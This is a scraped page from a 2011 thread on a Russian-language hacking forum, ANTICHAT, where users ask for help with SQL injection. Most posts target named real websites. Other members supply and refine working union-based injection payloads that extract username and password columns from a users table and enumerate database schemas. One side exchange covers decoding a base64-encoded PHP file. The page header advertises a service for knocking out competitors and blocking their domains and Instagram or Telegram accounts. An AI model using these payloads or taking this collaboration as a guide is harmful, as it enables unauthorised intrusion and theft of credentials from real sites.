УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1769 из 2438

1769

Опции темы

Поиск в этой теме

Опции просмотра

#17681

25.07.2011, 11:28

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Всем привет, помогите плыз разкрутить скулю,

http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729

я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?

#17682

25.07.2011, 12:15

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от qaz

qaz said:
Всем привет, помогите плыз разкрутить скулю,
http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729
я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?

Это ни разу не скуль. Пойми простые основы как определить есть ли скуль в запросе или нет. Простое подсовывание кавычки в запрос с последующим редиректом/выводом пустой страницы/выводом ошибки скрипта не значат о наличии скули на 100%.

#17683

25.07.2011, 12:21

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

[user]Expl0ited[/user], вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users

http://www.gagauzia.md/search.php

"мой запрос":

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#

#17684

25.07.2011, 12:55

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от 547

547 said:
[user]
Expl0ited
[/user], вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users
http://www.gagauzia.md/search.php
"мой запрос":
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#

немного модифицировал запрос

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#

#17685

25.07.2011, 21:35

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

исходник php файла кодирован в base64.

Но при попытке декодировать онлайн декодерами, вылезает билеберда

вот пример исходника

http://zalil.ru/31466463

#17686

25.07.2011, 21:56

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

заюзай notepad++ например. Там что-то бинарное

#17687

25.07.2011, 21:56

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,version%28%29,8,9

таблички вывести не получилось(

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,uhnex(hex(table_name)),8,9+from+infor mation_schema.tables --+

есть идеи?

#17688

25.07.2011, 22:07

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,/*!concat_ws%280x3a,table_schema,table_name,column_ name%29*/,4,5,6,7,8,9+from+information_schema.columns--

же

#17689

25.07.2011, 22:27

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

Цитата:

Сообщение от попугай

попугай said:
заюзай notepad++ например. Там что-то бинарное

а поподробнее можно?)

#17690

25.07.2011, 22:34

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Cherep

Cherep said:
а поподробнее можно?)

в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.

Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.

p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.

Страница 1769 из 2438

1769

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход